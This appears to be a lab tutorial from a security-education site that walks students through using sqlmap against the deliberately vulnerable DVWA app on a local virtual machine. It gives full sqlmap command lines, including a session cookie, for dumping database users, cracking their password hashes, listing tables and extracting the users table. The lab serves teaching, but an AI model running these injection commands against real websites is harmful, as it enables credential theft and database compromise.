ComputerSecurityStudent (CSS) [Login] [Join Now]


|SECURITY TOOLS >> Damn Vulnerable Web App >> DVWA v1.0.7 >> Current Page |Views: 87623

(Damn Vulnerable Web App (DVWA): Lesson 7)

{ Automate SQL Injection with SqlMap }

Section 0. Background Information
  • What is Damn Vulnerable Web App (DVWA)?
    • Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable.
    • Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.

  • What is a SQL Injection?
    • SQL injection (also known as SQL fishing) is a technique often used to attack data driven applications.
    • This is done by including portions of SQL statements in an entry field in an attempt to get the website to pass a newly formed rogue SQL command to the database (e.g., dump the database contents to the attacker). SQL injection is a code injection technique that exploits a security vulnerability in an application's software.
    • The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.

  • What is sqlmap?
    • sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a kick-ass detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

  • Pre-Requisite Labs
  • References
  • Lab Notes
    • In this lab we will do the following:
      1. We will use sqlmap to obtain the following pieces of information:
        1. A list of Database Management Usernames and Passwords.
        2. A list of databases
        3. A list of tables for a specified database
        4. A list of users and passwords for a specified database table.
  • Legal Disclaimer
    • As a condition of your use of this Web site, you warrant to computersecuritystudent.com that you will not use this Web site for any purpose that is unlawful or that is prohibited by these terms, conditions, and notices.
    • In accordance with UCC § 2-316, this product is provided with "no warranties, either expressed or implied." The information contained is provided "as-is", with "no guarantee of merchantability."
    • In addition, this is a teaching website that does not condone malicious behavior of any kind.
    • You are on notice, that continuing and/or using this lab outside your "own" test environment is considered malicious and is against the law.
    • © 2012 No content replication of any kind is allowed without express written permission.

     

Section 1: Configure Fedora14 Virtual Machine Settings
  1. Open Your VMware Player
    • Instructions:
      1. On Your Host Computer, Go To
      2. Start --> All Program --> VMWare --> VMWare Player

     

  2. Edit fedora14 Virtual Machine Settings
    • Instructions:
      1. Highlight fedora14
      2. Click Edit virtual machine settings

     

  3. Edit Network Adapter
    • Instructions:
      1. Highlight Network Adapter
      2. Select Bridged
      3. Click on the OK Button.

 

Section 2: Login to Fedora14
  1. Start Fedora14 VM Instance
    • Instructions:
      1. Start Up VMWare Player
      2. Select Fedora14
      3. Play virtual machine

     

  2. Login to Fedora14
    • Instructions:
      1. Login: student
      2. Password: <whatever you set it to>.

     

 

Section 3: Open Console Terminal and Retrieve IP Address
  1. Start a Terminal Console
    • Instructions:
      1. Applications --> Terminal

     

  2. Switch user to root
    • Instructions:
      1. su - root
      2. <Whatever you set the root password to>

     

  3. Get IP Address
    • Instructions:
      1. ifconfig -a
    • Notes(FYI):
      • As indicated below, my IP address is 192.168.1.106.
      • Please record your IP address.

     

Section 4: Configure BackTrack Virtual Machine Settings
  1. Open Your VMware Player
    • Instructions:
      1. On Your Host Computer, Go To
      2. Start --> All Program --> VMWare --> VMWare Player

     

  2. Edit BackTrack Virtual Machine Settings
    • Instructions:
      1. Highlight BackTrack5R1
      2. Click Edit virtual machine settings

     

  3. Edit Network Adapter
    • Instructions:
      1. Highlight Network Adapter
      2. Select Bridged
      3. Do not Click on the OK Button.

 

Section 5: Login to BackTrack
  1. Start BackTrack VM Instance
    • Instructions:
      1. Start Up VMWare Player
      2. Select BackTrack5R1
      3. Play virtual machine

     

  2. Login to BackTrack
    • Instructions:
      1. Login: root
      2. Password: toor or <whatever you changed it to>.

     

  3. Bring up the GNOME
    • Instructions:
      1. Type startx

 

Section 6: Open Console Terminal and Retrieve IP Address
  1. Open a console terminal
    • Instructions:
      1. Click on the console terminal

     

  2. Get IP Address
    • Instructions:
      1. ifconfig -a
    • Notes(FYI):
      • As indicated below, my IP address is 192.168.1.105.
      • Please record your IP address.

 

Section 7: Login to DVWA
  1. Start Firefox
    • Instructions:
      1. Click on Firefox

     

  2. Login to DVWA
    • Note(FYI):
      • Replace 192.168.1.106 with Fedora's IP address obtained in (Section 3, Step 3).
    • Instructions:
      1. Start up Firefox on BackTrack
      2. Place http://192.168.1.106/dvwa/login.php in the address bar.
      3. Login: admin
      4. Password: password
      5. Click on Login

 

Section 8: Set Security Level
  1. Set DVWA Security Level
    • Instructions:
      1. Click on DVWA Security, in the left hand menu.
      2. Select "low"
      3. Click Submit

     

Section 9: Obtain PHP Cookie
  1. SQL Injection Menu
    • Instructions:
      1. Select "SQL Injection" from the left navigation menu.

     

  2. Select Tamper Data
    • Instructions:
      1. Tools --> Tamper Data

     

  3. Start Tamper Data
    • Instructions:
      1. Click on Start Tamper

     

  4. Basic Injection
    • Instructions:
      1. Input "1" into the text box.
      2. Click Submit.
    • Notes(FYI):
      • The goal here is see the GET request being made to the CGI program behind the scenes.
      • Also, we will use the "Surname" output with SQLMAP to obtain database username and password contents.

     

  5. Tamper with request?
    • Instructions:
      1. Make sure the Continue Tampering? textbox is unchecked.
      2. Then Click Submit

     

  6. Copying the Referer URL
    • Instructions:
      1. Select the second GET Request
      2. Right Click on the Referer Link
      3. Select Copy

     

  7. Open Notepad
    • Instructions:
      1. Applications --> Wine --> Programs --> Accessories --> Notepad

     

  8. Paste Referer URL into Notepad
    • Instructions:
      1. Edit --> Paste

     

  9. Copying the Cookie Information
    • Instructions:
      1. Right Click on the Cookie line
      2. Select Copy

     

  10. Pasting the Cookie Information
    • Instructions:
      1. Edit --> Paste
    • Notes(FYI):
      • Now you should have copied both the Referer and Cookie lines into Notepad. (See Picture)

 

Section 10: Using SqlMap to Obtain Current User and Database
  1. Verify sqlmap.py exists
    • Instructions:
      1. cd /pentest/database/sqlmap
      2. ls -l sqlmap.py

     

  2. Obtain Database User For DVWA
    • Notes(FYI):
      1. Obtain the referer link from (Section 9, Step 10), which is placed after the "-u" flag below.
      2. Obtain the cookie line from (Section 9, Step 10), which is placed after the "--cookie" flag below.
      3. Replace 192.168.1.106 with Fedora's IP address obtained in (Section 3, Step 3).
      4. Replace (lpb5g4uss9kp70p8jccjeks621) with your PHPSESSID obtained from (Section 9, Step 10).
    • Instructions:
      1. ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -b --current-db --current-user
        • -u, Target URL
        • --cookie, HTTP Cookie header
        • -b, Retrieve DBMS banner
        • --current-db, Retrieve DBMS current database
        • --current-user, Retrieve DBMS current user

     

  3. Do you want to keep testing?
    • Instructions:
      1. keep testing? y
      2. skip payloads? y

     

  4. Viewing Results
    • Instructions:
      1. For the web application DVWA, the database name is "dvwa" and the programs that communicate with the database is "root@localhost";

 

Section 11: Using SqlMap to Obtain Database Management Username and Password
  1. Obtain Database Management Username and Password
    • Notes(FYI):
      • You must have completed Lesson 4 to see the db_hacker in Step 2.
      • Replace 192.168.1.106 with Fedora's IP address obtained in (Section 3, Step 3).
      • Replace (lpb5g4uss9kp70p8jccjeks621) with your PHPSESSID obtained from (Section 9, Step 10).
    • Instructions:
      1. ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" --string="Surname" --users --password
        • -u, Target URL
        • --cookie, HTTP Cookie header
        • -string, Provide a string set that is always present after valid or invalid query.
        • --users, list database management system users
        • --password, list database management password for system users.

     

  2. Obtain Database Management Username and Password (Part 2)
    • Instructions:
      1. Use Dictionary Attack? Y
      2. Dictionary Location? <Press Enter>
    • Notes(FYI):
      1. Notice the password for username db_hacker was cracked.

     

  3. Obtain db_hacker Database Privileges
    • Note(FYI):
      • Replace 192.168.1.106 with Fedora's IP address obtained in (Section 3, Step 3).
      • Replace (lpb5g4uss9kp70p8jccjeks621) with your PHPSESSID obtained from (Section 9, Step 10).
    • Instructions:
      1. ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -U db_hacker --privileges
        • -u, Target URL
        • --cookie, HTTP Cookie header
        • -U, Specify database management user
        • --privileges, list database management system user's privileges

     

  4. View Results: Obtain db_hacker Database Privileges
    • Instructions:
      1. Notice that DBMS user "db_hacker" has administrative privileges
      2. Notice that "db_hacker" can log in from anywhere, via the "%" wildcard operator.

 

Section 12: Obtain a list of all Databases
  1. Obtain a list of all databases
    • Notes(FYI):
      1. Obtain the referer link from (Section 9, Step 10), which is placed after the "-u" flag below.
      2. Obtain the cookie line from (Section 9, Step 10), which is placed after the "--cookie" flag below.
      3. Replace 192.168.1.106 with Fedora's IP address obtained in (Section 3, Step 3).
      4. Replace (lpb5g4uss9kp70p8jccjeks621) with your PHPSESSID obtained from (Section 9, Step 10).
    • Instructions:
      1. ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" --dbs
        • -u, Target URL
        • --cookie, HTTP Cookie header
        • --dbs, List database management system's databases.

     

  2. Review Results: Obtain a list of all databases
    • Notes(FYI):
      1. Notice that sqlmap supplies a list of available databases.

 

Section 13: Obtain "dvwa" tables and contents
  1. Obtain "dvwa" tables and contents
    • Notes(FYI):
      1. Obtain the referer link from (Section 9, Step 10), which is placed after the "-u" flag below.
      2. Obtain the cookie line from (Section 9, Step 10), which is placed after the "--cookie" flag below.
      3. Replace 192.168.1.106 with Fedora's IP address obtained in (Section 3, Step 3).
      4. Replace (lpb5g4uss9kp70p8jccjeks621) with your PHPSESSID obtained from (Section 9, Step 10).
    • Instructions:
      1. ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -D dvwa --tables
        • -u, Target URL
        • --cookie, HTTP Cookie header
        • -D, Specify Database
        • --tables, List Database Tables

     

  2. Viewing "dvwa" tables and content results
    • Notes(FYI):
      1. Notice sqlmap listed two tables: guestbook and users.

     

  3. Obtain columns for table dvwa.users
    • Notes(FYI):
      1. Obtain the referer link from (Section 9, Step 10), which is placed after the "-u" flag below.
      2. Obtain the cookie line from (Section 9, Step 10), which is placed after the "--cookie" flag below.
      3. Replace 192.168.1.106 with Fedora's IP address obtained in (Section 3, Step 3).
      4. Replace (lpb5g4uss9kp70p8jccjeks621) with your PHPSESSID obtained from (Section 9, Step 10).
    • Instructions:
      1. ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -D dvwa -T users --columns
        • -u, Target URL
        • --cookie, HTTP Cookie header
        • -D, Specify Database
        • -T, Specify the Database Table
        • --columns, List the Columns of the Database Table.

     

  4. Viewing Results: columns for table dvwa.users
    • Notes(FYI):
      1. Notice that there are both a user and password columns in the dvwa.users table.

     

  5. Obtain Users and their Passwords from table dvwa.users (Part 1)
    • Notes(FYI):
      1. Obtain the referer link from (Section 9, Step 10), which is placed after the "-u" flag below.
      2. Obtain the cookie line from (Section 9, Step 10), which is placed after the "--cookie" flag below.
      3. Replace 192.168.1.106 with Fedora's IP address obtained in (Section 3, Step 3).
      4. Replace (lpb5g4uss9kp70p8jccjeks621) with your PHPSESSID obtained from (Section 9, Step 10).
    • Instructions:
      1. ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -D dvwa -T users -C user,password --dump
        • -u, Target URL
        • --cookie, HTTP Cookie header
        • -D, Specify Database
        • -C, List user and password columns
        • --dump, Dump table contents

     

  6. Obtain Users and their Passwords from table dvwa.users (Part 2)
    • Instructions:
      1. Do you want to use the LIKE operator? Y
      2. Recognize possible HASH values? Y
      3. What's the dictionary location? <Press Enter>
      4. Use common password suffixes? y

     

  7. Review Results: Users and their Passwords from table dvwa.users
    • Notes(FYI):
      1. Notice how sqlmap nicely displays passwords for each user.

 

Section 14: Proof of Lab Using John the Ripper
  1. Proof of Lab
    • Instructions:
      1. Bring up a new terminal, see (Section 7, Step 1)
      2. cd /pentest/database/sqlmap
      3. find output/* -print | xargs ls -l
      4. date
      5. echo "Your Name"
        • Replace the string "Your Name" with your actual name.
        • e.g., echo "John Gray"
    • Proof of Lab Instructions:
      1. Do a <PrtScn>
      2. Paste into a word document
      3. Upload to Moodle

 
Linksys WUSB54GC ver 3 BackTrack Compatible Wireless Card.


Perfect for Wardriving


Another Alfa Product Perfect for Wardriving


NETGEAR wg111v2


ZyXEL AG-225H v2


BCM4312 802.11b/g LP-PHY


D-Link WNA-2330 PCMCIA


Atheros AR9285